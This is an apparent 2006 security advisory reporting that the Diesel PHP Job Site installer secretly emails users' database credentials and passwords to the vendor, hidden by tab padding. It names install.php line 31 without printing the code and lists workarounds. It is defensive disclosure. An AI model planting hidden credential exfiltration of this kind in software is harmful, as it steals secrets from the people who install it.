Subject: [Info Disclosure] Diesel PHP Job Site Latest Version

Severity: Pretty Bad
Title: Diesel PHP Job Site Latest Version Information Disclosure
Home Page: http://www.dieselscripts.com/
Product Page: http://www.dieselscripts.com/diesel-job-site.html
Date: May 17, 2006


Synopsis:
=========
When an unsuspecting user installs this software on their
webserver, all information is emailed back to the original
programmers of this software. This information is sent
from install.php, which includes the database host,
database name, username, and password used to connect.


Background:
===========
This script allows job seekers to post their resumes
and search job postings for free and employers pay
a fee to post jobs and search the resumes online.
Free posting and searching is also possible.


Information:
============
I run a VOIP Jobs site tailored to the Asterisk Community.
As I do not have much money or investors I couldn't afford
some swanky ass Job Board. I found this one, which was
relatively cheap, but required register_globals. I bought it
anyway (mistake #1). So, I thought I would be nice, and edit
their software to remove this requirement. While I was looking
through the code I found this little gem in the install file.

Details:
========
In install.php, line 31, there is a call to a mail function
that emails support@dieselscripts.com with your username,
email, database credentials, hosts and passwords. Due to their
licensing agreement I'm not actually allowed to post the offending
line of code from the file.

It's worth mentioning that they also tried to hide this from
unsuspecting users by tabbing it across the screen a number of
times so it was hidden if scrolling without wordwrap on. Sneaky bastards.

Fix/Workaround:
===============
1. Don't use this software
2. Use it, but first comment/delete that line from install.php
3. Disable the ability to send mail from PHP/Server